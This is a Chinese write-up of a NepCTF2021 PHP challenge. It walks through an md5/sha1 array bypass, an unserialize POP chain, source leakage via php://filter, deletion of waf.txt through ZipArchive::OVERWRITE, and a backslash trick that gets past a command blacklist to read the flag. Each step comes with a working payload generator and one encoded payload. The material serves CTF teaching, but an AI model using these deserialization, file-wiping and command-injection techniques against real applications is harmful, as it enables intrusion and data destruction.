NepCTF2021 梦里花开牡丹亭
2021/4/10 18:43:53
NepCTF2021 梦里花开牡丹亭
知识点:
1.数组绕过（入口要求 a!==b 但 md5/sha1 相等：传 a[]=1&b[]=2，PHP 7 下 md5()/sha1() 收到数组时返回 NULL 并给出警告——警告已被 error_reporting(0) 压掉——于是 NULL===NULL 成立；PHP 8 改为抛 TypeError，此法不再适用）
2.pop链
3.利用 ZipArchive 内置类的 open 方法（第二个参数传 ZipArchive::OVERWRITE）达到删除/清空文件的效果
解题:
源码:
<?php
// Challenge entry point (index.php). Each class below is one link of the
// unserialize gadget chain the writeup exploits; the comments mark what every
// link needs from attacker-controlled data.
highlight_file(__FILE__);
// Silences, among other things, the warning md5()/sha1() emit for an array
// argument (see the guard at the bottom of the file).
error_reporting(0);
include('shell.php'); // provides shell($cmd), reachable through Open::open()

class Game
{
    public $username;
    public $password;
    public $choice;
    public $register;
    public $file;
    public $filename;
    public $content;

    // Only runs for objects created with `new`; an unserialized Game keeps
    // whatever username/password the payload carries.
    public function __construct()
    {
        $this->username='user';
        $this->password='user';
    }

    // Runs on unserialize(). The literal is md5('admin'): with register set
    // to "admin" the payload's file/filename/content are copied into a login
    // object; otherwise $choice becomes a harmless register.
    public function __wakeup()
    {
        if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){
            $this->choice=new login($this->file,$this->filename,$this->content);
        }else{
            $this->choice = new register();
        }
    }

    // Fires when the unserialized object is released; hands the credentials
    // from the payload to whichever object __wakeup stored in $choice.
    public function __destruct()
    {
        $this->choice->checking($this->username,$this->password);
    }
}

class login
{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

    // $file is an arbitrary object from the payload, so any class with an
    // open($a, $b) method is reachable here: Open below, or a built-in such
    // as ZipArchive (used by the writeup to wipe waf.txt).
    public function checking($username,$password)
    {
        if($username==='admin'&&$password==='admin'){
            $this->file->open($this->filename,$this->content);
            die('login success you can to open shell file!');
        }
    }
}

class register
{
    // Dead end for the chain: both branches terminate without touching files.
    public function checking($username,$password)
    {
        if($username==='admin'&&$password==='admin'){
            die('success register admin');
        }else{
            die('please register admin ');
        }
    }
}

class Open
{
    // Two attacker-chosen branches. If waf.txt cannot be read (missing, or
    // empty: file_get_contents() returns '' for a 0-byte file, which is also
    // falsy) $content goes straight to shell(). Otherwise $filename.".php" is
    // read back, so a php://filter wrapper leaks source as base64.
    function open($filename, $content){
        if(!file_get_contents('waf.txt')){
            shell($content);
        }else{
            echo file_get_contents($filename.".php");
        }
    }
}

// Entry guard. It looks like it demands an md5 *and* sha1 collision between
// two different values, but arrays defeat it: on PHP 7 md5()/sha1() return
// NULL for an array argument (warning suppressed above), so a[]=1&b[]=2 makes
// both hash comparisons NULL===NULL while the arrays themselves differ.
// On PHP 8 the same call throws a TypeError instead.
// Root cause of the challenge: attacker-controlled POST data reaches
// unserialize(); the @ hides any unserialize notice.
if($_GET['a']!==$_GET['b']&&(md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a'])=== sha1($_GET['b']))){
    @unserialize(base64_decode($_POST['unser']));
}
if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3")
MD5 不可逆，这里是查表（或自己算 md5('admin')）得知该哈希对应 admin，因此 register 要等于 admin。
先查看 shell.php：利用 Open::open 的 else 分支，把 filename 设为 php://filter 的 base64 读取包装（目标会在后面自动拼上 .php），即可读出 shell.php 的源码：
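<?php
// Payload generator, step 1: leak shell.php through the else branch of
// Open::open() on the target (index.php). Run locally, then POST the printed
// base64 as `unser` together with the a[]=1&b[]=2 guard bypass.
//
// serialize() only cares about the class name and the public property
// names/values; the target's own Game::__wakeup/__destruct drive the chain.
// The magic methods are deliberately left out of this local copy: a
// __destruct() that calls $this->choice->checking() would run at script
// shutdown with $choice === null and throw
// "Call to a member function checking() on null" right after the payload.
class Game{
    public $username = 'admin';   // login::checking() on the target wants admin/admin
    public $password = 'admin';
    public $choice;               // filled in by the target's __wakeup, not here
    public $register = "admin";   // md5('admin') is the hash __wakeup compares against
    public $file;                 // assigned below
    // Open::open() appends ".php", so resource=shell resolves to shell.php
    public $filename = 'php://filter/read=convert.base64-encode/resource=shell';
    public $content;              // unused on this branch
}

// Same class name as the target's Open. The method body never runs locally;
// only the name is serialized (O:4:"Open":0:{}).
class Open{
    function open($filename, $content){
    }
}

$a=new Game();
$a->file=new Open();
echo base64_encode(serialize($a));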
解码得到 shell.php（末尾的 login success you can to open shell file! 不是文件内容，而是 login::checking 里 die() 的输出）：
<?php
// shell.php — the command sink reached from Open::open() in index.php.
// Constraints on $cmd: fewer than 10 bytes, and none of the blacklisted
// substrings; `*` and `?` are blocked as well, so globbing is unavailable.
// The blacklist is matched against the raw string while system() hands that
// string to a shell, so "n\l /flag" (9 bytes) passes the regex and the shell
// still runs nl.
function shell($cmd){
    if(strlen($cmd)<10){
        if(preg_match('/cat|tac|more|less|head|tail|nl|tail|sort|od|base|awk|cut|grep|uniq|string|sed|rev|zip|\*|\?/',$cmd)){
            die("NO");
        }else{
            return system($cmd);
        }
    }else{
        die('so long!');
    }
}
// Not part of shell.php: the text below is the die() message from
// login::checking() in index.php, which followed the leaked source on screen.
login success you can to open shell file!
联合index.php里面的Open类:
class Open{
    function open($filename, $content){
        if(!file_get_contents('waf.txt')){
            // Reached only when waf.txt cannot be read (missing, or empty:
            // a 0-byte file yields '' which is also falsy) — this is the
            // branch that leads to the flag.
            shell($content);
        }else{
            // filename=php://filter/read=convert.base64-encode/resource=shell
            // ".php" is appended, so the filter wrapper leaks shell.php as base64.
            echo file_get_contents($filename.".php");
        }
    }
}
可知我们只要使 file_get_contents('waf.txt')
读取失败就可以进入 shell($content)
来执行系统命令。所以我们要想办法把 waf.txt 删除（或者清空——空文件读出的是空字符串，同样为假），这样条件成立，才能执行我们的命令。
所以我们利用ZipArchive
原生类调用它的 open 方法（第二个参数传 ZipArchive::OVERWRITE，即整数 8），即可将 $filename（waf.txt）
删除:
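<?php
// Payload generator, step 2: remove (or at least truncate) waf.txt on the
// target so that Open::open() takes the shell() branch next time.
//
// On the target, login::checking() calls $this->file->open($filename, $content)
// with an attacker-chosen $file, so any class with an open($a, $b) method is a
// usable gadget. The built-in ZipArchive fits: ZipArchive::open('waf.txt',
// ZipArchive::OVERWRITE) starts a fresh archive at that path, discarding the
// existing file (the writeup reports the file is gone afterwards; even a
// 0-byte file would do, since file_get_contents() then returns '' — falsy).
//
// Fixes relative to the first draft of this generator:
//  * `public $file = new ZipArchive();` is a compile error: `new` is not
//    allowed in a property initializer (PHP 8.1 permits it only in parameter,
//    static-variable, global-constant and attribute initializers). The object
//    is assigned after construction instead.
//  * A __construct() resetting username/password to 'user' would serialize
//    the wrong credentials and login::checking() on the target would never
//    reach open(); the payload in the writeup carries admin/admin.
//  * No __destruct(): calling $this->choice->checking() on a null $choice
//    throws at script shutdown, right after the payload is printed.
class Game{
    public $username = "admin";
    public $password = "admin";
    public $choice;                          // filled in by the target's __wakeup
    public $register = "admin";              // must hash to 21232f297a57a5a743894a0e4a801fc3
    public $file;                            // ZipArchive instance, assigned below
    public $filename = "waf.txt";            // first argument to ZipArchive::open()
    public $content = ZipArchive::OVERWRITE; // second argument; integer 8, serialized as i:8
}

$poc = new Game();
$poc->file = new ZipArchive(); // needs the zip extension locally
echo base64_encode(serialize($poc));
// Note: which ZipArchive properties serialize() emits depends on the PHP
// version (status/statusSys/numFiles/filename/comment on the build used in
// the writeup; newer builds may add more). The target only needs the class
// name, so a different property list does not affect the exploit.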
生成payload:
Tzo0OiJHYW1lIjo3OntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjU6ImFkbWluIjtzOjY6ImNob2ljZSI7TjtzOjg6InJlZ2lzdGVyIjtzOjU6ImFkbWluIjtzOjQ6ImZpbGUiO086MTA6IlppcEFyY2hpdmUiOjU6e3M6Njoic3RhdHVzIjtpOjA7czo5OiJzdGF0dXNTeXMiO2k6MDtzOjg6Im51bUZpbGVzIjtpOjA7czo4OiJmaWxlbmFtZSI7czowOiIiO3M6NzoiY29tbWVudCI7czowOiIiO31zOjg6ImZpbGVuYW1lIjtzOjc6IndhZi50eHQiO3M6NzoiY29udGVudCI7aTo4O30=
删除了waf.txt
。接下来就可以使用 n\l /flag（用反斜杠拆开 nl 绕过黑名单，shell 会忽略这个反斜杠；注意 * 和 ? 也在黑名单里，不能用 /fla* 这样的通配符，且命令总长度必须小于 10）
执行命令读取flag了:
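<?php
// Payload generator, step 3: with waf.txt unreadable, Open::open() on the
// target passes $content straight to shell(), which hands it to system().
// shell() (shell.php) accepts fewer than 10 bytes and rejects a substring
// blacklist that includes nl, * and ?; "n\l /flag" (9 bytes) does not match
// the regex, while the shell drops the backslash and runs `nl /flag`.
//
// As in the other generators, the target-side __wakeup/__destruct are left
// out: a local __destruct() would call checking() on a null $choice at
// shutdown and throw right after the payload is printed.
class Game{
    public $username = 'admin';
    public $password = 'admin';
    public $choice;
    public $register = "admin";
    public $file;
    // Only read on the else branch of Open::open(), which is not taken once
    // waf.txt is gone, so any string works here.
    public $filename = '...';
    // In a PHP double-quoted string an unknown escape such as \l is kept
    // verbatim, so the value really is n\l /flag.
    public $content = "n\l /flag";
}

// Same class name as the target's Open; only the name is serialized.
class Open{
    function open($filename, $content){
    }
}

$a=new Game();
$a->file=new Open();
echo base64_encode(serialize($a));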